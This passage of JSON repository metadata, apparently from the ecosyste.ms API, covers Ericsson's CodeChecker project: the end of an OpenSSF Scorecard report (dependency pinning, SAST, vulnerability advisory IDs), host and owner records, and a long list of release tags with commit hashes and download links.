hash: .github/workflows/test.yml:177","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:217","Info:   0 out of  28 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   6 third-party GitHubAction dependencies pinned","Info:   0 out of   5 containerImage dependencies pinned","Info:   0 out of  24 pipCommand dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"24 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-9hjg-9r4m-mvj7","Warn: Project is vulnerable to: GHSA-3ww4-gg4f-jr7f","Warn: Project is vulnerable to: PYSEC-2024-225 / GHSA-6vqw-3v5j-54x4","Warn: Project is vulnerable to: GHSA-9v9h-cgj8-h64p","Warn: Project is vulnerable to: GHSA-h4gh-qq45-vh27","Warn: Project is vulnerable to: PYSEC-2023-254 / GHSA-jfhm-5ghh-2f97","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-2j2x-2gpw-g8fm","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-2p57-rm9w-gvfp","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-7fh5-64p2-3v2j","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-cchq-frgv-rjh5","Warn: Project is vulnerable to: GHSA-g644-9gfx-q4q4","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-14T22:53:38.249Z","repository_id":37431651,"created_at":"2025-08-14T22:53:38.249Z","updated_at":"2025-08-14T22:53:38.249Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271198843,"owners_count":24717130,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-19T02:00:09.176Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"Ericsson","name":"Ericsson","uuid":"4161311","kind":"organization","description":"Home for Ericsson's Open Source software","email":"opensource@ericsson.com","website":"http://www.ericsson.com","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/4161311?v=4","repositories_count":119,"last_synced_at":"2024-04-15T22:07:40.334Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/Ericsson","funding_links":[],"total_stars":4306,"followers":165,"following":0,"created_at":"2022-11-05T10:49:44.232Z","updated_at":"2024-04-15T22:07:56.651Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson/repositories"},"tags":[{"name":"v6.26.1","sha":"b7810134193a48f9ec33da861b1e308f7ed553b8","kind":"commit","published_at":"2025-07-10T17:42:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1/manifests"},{"name":"v6.26.0","sha":"0bbf351e870c7056cd9cc0dc44a795c0fe805dfa","kind":"commit","published_at":"2025-06-06T23:31:28.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0/manifests"},{"name":"v6.26.0-rc1","sha":"e0b9374245f88450d5b6dc4b164f78d9e2f06cfb","kind":"commit","published_at":"2025-04-28T09:21:09.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1/manifests"},{"name":"v6.25.1","sha":"c63dcdd8aa8dbd47360a0a02234c94e45107fb76","kind":"commit","published_at":"2025-03-12T13:44:01.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1/manifests"},{"name":"v6.25.0","sha":"d1ca304f33f4852275a612c05fc9fa102e34dcaa","kind":"commit","published_at":"2025-03-05T08:55:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0/manifests"},{"name":"v6.24.7","sha":"71f343577e0eea089e53b3bd78dfcb8867403cf3","kind":"commit","published_at":"2025-02-18T10:30:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7/manifests"},{"name":"v6.24.6","sha":"4ce6544bb734faa69fc00023b1477f416541933a","kind":"commit","published_at":"2025-02-17T15:00:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6/manifests"},{"name":"v6.24.5","sha":"5914f3a98336823c3a0a1061d84832ed88822469","kind":"commit","published_at":"2025-01-21T14:55:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5/manifests"},{"name":"v6.25.0-rc1","sha":"920d71089ac661d07670c8b9d5c2dd2cebcafcbd","kind":"commit","published_at":"2024-12-11T08:48:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1/manifests"},{"name":"v6.24.4","sha":"454d978191ed42c8202a2244dc092dfb6fd8c83a","kind":"commit","published_at":"2024-10-25T10:41:35.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4/manifests"},{"name":"v6.24.3","sha":"42074b5e3e3e8c166364b6a618b3795de60c6bbf","kind":"commit","published_at":"2024-10-18T13:35:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3/manifests"},{"name":"v6.24.2","sha":"ad41702e3108e4b92ae5d0143a5b961cc34195eb","kind":"commit","published_at":"2024-10-18T10:18:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2/manifests"},{"name":"v6.24.1","sha":"2cc6285dfd32b786e92239d4038dcdea3abfb63b","kind":"commit","published_at":"2024-09-13T09:33:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1/manifests"},{"name":"v6.24.0","sha":"ea795071d62637c69300f4528b6c46c75b2274bc","kind":"commit","published_at":"2024-06-12T12:29:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0/manifests"},{"name":"v6.24.0-rc1","sha":"f05a9bf97759b133f0729aaf12232c54b46b7c19","kind":"commit","published_at":"2024-04-18T06:33:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1/manifests"},{"name":"v6.23.1","sha":"2a8fa6e711a4ff591280a79fe8798dee2507d984","kind":"commit","published_at":"2023-12-14T14:30:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1/manifests"},{"name":"v6.23.0","sha":"bea15d4fb77478860dee41f6e7f206050720869a","kind":"commit","published_at":"2023-12-08T18:46:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0/manifests"},{"name":"v6.23.0-rc2","sha":"605ba1b9db6ed067c89a12f7055cc177b76f8ed6","kind":"commit","published_at":"2023-11-17T11:24:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2/manifests"},{"name":"v6.23.0-rc1","sha":"848e335ff33e49db1905331424c268d423feb7fc","kind":"commit","published_at":"2023-10-30T14:42:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1/manifests"},{"name":"v6.22.2","sha":"a3d35cfd509b995187288cd8631446415a334257","kind":"commit","published_at":"2023-07-13T14:47:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2/manifests"},{"name":"v6.22.1","sha":"8aabb4f715ed971f5ff9751b438e2ac00016e145","kind":"commit","published_at":"2023-04-19T13:23:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1/manifests"},{"name":"v6.22.0","sha":"ecf377637b86360c75508952b2e43fabac2aec6b","kind":"commit","published_at":"2023-04-14T13:22:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0/manifests"},{"name":"v6.22.0-rc1","sha":"6fc70f69b75ccbe46f537cc817b0cf07ba9c8cd9","kind":"commit","published_at":"2023-03-24T14:34:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1/manifests"},{"name":"v6.21.0","sha":"fe0ac5b291ed3cfef8fd8c6909501de55dabc20e","kind":"commit","published_at":"2022-11-09T17:22:05.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0/manifests"},{"name":"v6.20.0-hotfix5","sha":"e70c682f11af655d6b174a15d596ed913f1cb924","kind":"commit","published_at":"2022-11-04T13:36:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5/manifests"},{"name":"v6.20.0-hotfix4","sha":"cbefae31ba2a4b66944af401da05e85b858a290a","kind":"commit","published_at":"2022-11-03T17:44:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4/manifests"},{"name":"v6.21.0-rc1","sha":"b629fb04a7f05dbbc74aff0616add06ef9b26dd1","kind":"commit","published_at":"2022-10-27T09:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1/manifests"},{"name":"v6.20.0-hotfix3","sha":"49a50a849df44881e7709cb26f7daa2380139359","kind":"commit","published_at":"2022-09-26T17:11:33.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3/manifests"},{"name":"v6.20.0-hotfix2","sha":"b518f9af122c36fc9896a2f1fafe417395e2e82e","kind":"commit","published_at":"2022-09-21T18:46:30.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2/manifests"},{"name":"v6.20.0-hotfix1","sha":"0297574b742ab8186665c3a5d2917fa89245b59f","kind":"commit","published_at":"2022-09-19T17:24:52.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1/manifests"},{"name":"v6.20.0","sha":"7d65d89c2a3fed84f395016d4c9815bab860d0b3","kind":"commit","published_at":"2022-09-15T11:44:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0/manifests"},{"name":"v6.20.0-rc1","sha":"d24c22cd39a9e7a9145c5293843c6450e31862db","kind":"commit","published_at":"2022-08-22T21:27:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1/manifests"},{"name":"v6.19.1-hotfix2","sha":"c0af8d9a42f75f28ccfdc149194e5cc95be14841","kind":"commit","published_at":"2022-07-21T15:16:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2/manifests"},{"name":"v6.19.1-hotfix1","sha":"d564db65a58fc7ef651ab1474a72eadf4c29c55f","kind":"commit","published_at":"2022-07-06T13:28:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1/manifests"},{"name":"v6.19.1","sha":"9fa0f9817f6e91eda2a9202e0a3bf5006accdc8c","kind":"commit","published_at":"2022-03-18T15:09:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1/manifests"},{"name":"v6.19.0-hotfix1","sha":"e262d015068c6b49f92a2afb1a166eb4f4438e84","kind":"commit","published_at":"2022-03-12T13:05:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1/manifests"},{"name":"v6.19.0","sha":"5f5b6b7e7ecd70d23079580c063f4e4f2bb2a7ad","kind":"commit","published_at":"2022-03-10T13:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0/manifests"},{"name":"v6.18.2-hotfix1